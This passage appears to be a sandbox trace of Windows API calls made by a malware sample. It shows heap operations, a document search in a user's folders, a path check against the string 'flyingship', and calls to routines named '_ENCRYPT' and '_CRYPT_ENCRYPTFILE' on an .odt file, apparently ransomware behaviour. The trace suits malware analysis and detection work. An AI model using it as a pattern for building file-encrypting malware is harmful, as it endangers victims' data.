lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0178.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0178.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0178.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0178.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0178.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0178.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0178.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.869] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0178.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0178.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0178.869] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0178.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0178.869] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0178.869] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0178.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0178.870] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0178.870] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0178.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0178.870] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.870] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.870] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.870] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99398460, ftCreationTime.dwHighDateTime=0x1d5e685, ftLastAccessTime.dwLowDateTime=0xa24a8550, ftLastAccessTime.dwHighDateTime=0x1d5dc43, ftLastWriteTime.dwLowDateTime=0xa24a8550, ftLastWriteTime.dwHighDateTime=0x1d5dc43, nFileSizeHigh=0x0, nFileSizeLow=0x108d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="g4FThfJBWB6.odt", cAlternateFileName="G4FTHF~1.ODT")) returned 0x90add8 [0178.871] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0178.871] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.871] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99398460, ftCreationTime.dwHighDateTime=0x1d5e685, ftLastAccessTime.dwLowDateTime=0xa24a8550, ftLastAccessTime.dwHighDateTime=0x1d5dc43, ftLastWriteTime.dwLowDateTime=0xa24a8550, ftLastWriteTime.dwHighDateTime=0x1d5dc43, nFileSizeHigh=0x0, nFileSizeLow=0x108d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="g4FThfJBWB6.odt", cAlternateFileName="G4FTHF~1.ODT")) returned 0x90add8 [0178.871] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0178.872] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rhLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hLGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LGiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GiSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iSQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SQMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QMqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MqRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qRNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RNAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NAIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AIhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IhM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hM\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ThfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hfJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fJBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JBWB6.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.874] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.874] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0178.874] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0178.874] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0178.874] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.875] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.875] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.875] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.875] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.875] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99398460, ftCreationTime.dwHighDateTime=0x1d5e685, ftLastAccessTime.dwLowDateTime=0xa24a8550, ftLastAccessTime.dwHighDateTime=0x1d5dc43, ftLastWriteTime.dwLowDateTime=0xa24a8550, ftLastWriteTime.dwHighDateTime=0x1d5dc43, nFileSizeHigh=0x0, nFileSizeLow=0x108d, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="g4FThfJBWB6.odt", cAlternateFileName="G4FTHF~1.ODT")) returned 0x90ae18 [0178.875] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 